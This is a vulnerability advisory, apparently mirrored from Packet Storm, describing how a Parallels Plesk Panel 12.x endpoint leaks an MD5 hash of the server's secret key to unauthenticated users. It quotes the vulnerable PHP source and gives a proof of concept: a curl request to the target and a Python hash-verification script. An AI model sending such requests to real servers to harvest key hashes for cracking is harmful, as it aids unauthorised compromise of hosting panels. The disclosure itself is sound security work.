Lucene search
K

Parallels Plesk Panel 12.x Key Disclosure

🗓️ 22 Apr 2014 00:00:00Reported by Tim RotsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

Parallels Plesk Panel 12.x Key Disclosure vulnerability in Linu

Code
`While auditing the source code for Parallels Plesk Panel 12.x on Linux I  
noticed the following feature that leads to leakage of the  
'/etc/psa/private/secret_key'-file in md5 format to non-authenticated users.  
  
Parallels responded that the 16byte 'secret_key' should provide sufficient  
entropy for this not being an issue.  
Soooo... even if I can control part of the salt to calculate the md5sum..?  
See for yourself.  
  
  
Code where the bug resides in:  
----  
/opt/psa/admin/htdocs/enterprise/rsession_init.php  
  
31 if ($failureRedirectUrl = get_gpc('failure_redirect_url')) {  
36 hspc_setopt('failure_redirect_url', $failureRedirectUrl);  
>37 hspc_setopt('failure_redirect_url_sign', md5($failureRedirectUrl .  
Plesk_Base_Utils_String::getCryptKey()));  
38 }  
...  
..  
/opt/psa/admin/plib/Plesk/Base/Utils/String.php  
  
363 final public static function getCryptKey() {  
...  
369 if (Os::UNIX) {  
370 self::$_cryptKey = @file_get_contents(ENCRYPT_KEY_FILE);  
..  
380 return self::$_cryptKey;  
381 }  
...  
..  
/opt/psa/admin/plib/compile_time_defaults.php  
  
12 define('ENCRYPT_KEY_FILE', "/etc/psa/private/secret_key");  
----  
  
  
Summary of bug:  
  
- user sends 1 HTTP requst to rsession_init.php on the remote server which  
contains an invalid PHPSESSIONID and a redirect URL for when the login  
fails.  
- script sets two cookies which contains the following values:  
failure_redirect_url = $failureRedirectUrl (supplied in URL)  
failure_redirect_url_sign = md5($failureRedirectUrl + contents  
/etc/psa/private/secret_key)  
  
[+] Annoying redirect loop if localhost is specified as url to to redirect  
to when login fails until cookies are cleared.  
  
  
PoC:  
root@debian7:~# #see /usr/local/psa/admin/sbin/encrypt_keygen for details  
on key generation routine  
root@debian7:~# dd if=/dev/urandom of=/etc/psa/private/secret_key bs=16  
count=1  
1+0 records in  
1+0 records out  
16 bytes (16 B) copied, 0.000183366 s, 87.3 kB/s  
  
root@debian7:~# hexdump -C /etc/psa/private/secret_key  
00000000 99 51 17 9a c6 8c 6e bd 4a 75 98 73 e2 64 fa e4  
|.Q....n.Ju.s.d..|  
  
  
$ curl -k -i -s "  
https://debian7:8443/enterprise/rsession_init.php?PHPSESSID=000000000000000000000000000000000&failure_redirect_url=w00t"|awk  
'/fail/ {print $2}'  
.  
..  
...  
failure_redirect_url=w00t;  
failure_redirect_url_sign=03ba5675030c59bf66bbc2f4d30aec61;  
  
  
root@debian7:~# ./poc.py  
03ba5675030c59bf66bbc2f4d30aec61  
  
---poc.py---  
#! /usr/bin/env python  
  
import hashlib  
import binascii  
  
with open('/etc/psa/private/secret_key') as f:  
whoops = hashlib.md5("w00t" +  
binascii.unhexlify(f.read().encode('hex'))).hexdigest()  
print whoops  
------  
  
  
In theory this bug will give you enough ammunition to calculate the  
contents of the /etc/psa/private/secret_key as we have part of the salt,  
and already know the outcome of a insecure hashing algorithm to match  
against.  
I'm glad nobody owns the amount of computing power which is required to  
abuse this bug nowadays anyhow .. :']  
  
Regards,  
  
Tim Rots  
  
The Netherlands  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation